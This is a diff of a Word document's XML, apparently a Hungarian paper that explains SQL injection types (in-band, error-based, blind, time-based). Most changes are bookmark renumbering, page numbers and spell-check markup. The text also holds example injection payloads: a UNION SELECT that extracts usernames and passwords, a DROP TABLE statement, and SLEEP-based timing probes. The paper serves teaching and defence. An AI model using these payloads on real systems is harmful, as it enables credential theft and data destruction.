             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019995" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124910" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2118,7 +2340,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019995 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124910 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2164,7 +2386,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019996" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124911" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2208,7 +2430,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019996 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124911 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2254,7 +2476,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019997" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124912" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2300,7 +2522,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019997 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124912 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2346,7 +2568,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019998" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124913" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2390,7 +2612,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019998 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124913 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2436,7 +2658,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019999" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124914" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2482,7 +2704,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019999 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124914 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2528,7 +2750,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020000" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124915" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2551,7 +2773,7 @@
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Naive Bayes</w:t>
+              <w:t>Gaussian Naive Bayes</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2572,7 +2794,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020000 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124915 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2592,7 +2814,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2618,7 +2840,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020001" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124916" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2662,7 +2884,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020001 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124916 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2682,7 +2904,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2708,7 +2930,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020002" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124917" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2752,7 +2974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020002 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124917 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2772,7 +2994,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2797,7 +3019,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020003" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124918" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2825,7 +3047,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020003 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124918 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2845,7 +3067,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2870,7 +3092,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020004" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124919" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2898,7 +3120,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020004 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124919 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2918,7 +3140,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2943,7 +3165,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020005" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124920" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2971,7 +3193,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020005 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124920 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2991,7 +3213,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3052,7 +3274,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc71019991"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc71124906"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3372,7 +3594,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc71019992"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc71124907"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3397,7 +3619,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A téma</w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3405,6 +3634,7 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3473,7 +3703,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>The Open Web Application Security Project</w:t>
+        <w:t xml:space="preserve">The Open Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3643,7 +3901,52 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>' UNION SELECT username, password FROM user</w:t>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>user</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3653,6 +3956,7 @@
         </w:rPr>
         <w:t>s</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3709,6 +4013,7 @@
         </w:rPr>
         <w:t xml:space="preserve">létezik </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3717,12 +4022,14 @@
         </w:rPr>
         <w:t>users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> tábla, valamint </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3731,12 +4038,14 @@
         </w:rPr>
         <w:t>username</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> és </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3745,6 +4054,7 @@
         </w:rPr>
         <w:t>password</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3763,8 +4073,144 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gifts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3868,7 +4314,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc71019993"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc71124908"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3894,7 +4340,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc71019994"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc71124909"/>
       <w:r>
         <w:t>Sávon belüli</w:t>
       </w:r>
@@ -3902,18 +4348,33 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
+        <w:t>(in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>classic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4193,8 +4654,18 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>105; DROP TABLE Suppliers</w:t>
-      </w:r>
+        <w:t xml:space="preserve">105; DROP TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Suppliers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -4274,6 +4745,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4282,6 +4754,7 @@
         </w:rPr>
         <w:t>Users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4306,6 +4779,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4314,6 +4788,7 @@
         </w:rPr>
         <w:t>UserId</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4386,6 +4861,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4410,6 +4886,7 @@
         </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -4517,7 +4994,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (error-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4730,23 +5221,35 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc71019995"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc71124910"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:r>
-        <w:t>, inferential</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inferential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4891,7 +5394,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (boolean-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5035,7 +5552,97 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+        <w:t xml:space="preserve"> SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>doby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5278,7 +5885,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(time-based) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>time-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5322,11 +5943,19 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5350,6 +5979,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5358,13 +5988,32 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-SLEEP(15)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5394,7 +6043,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5426,7 +6089,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
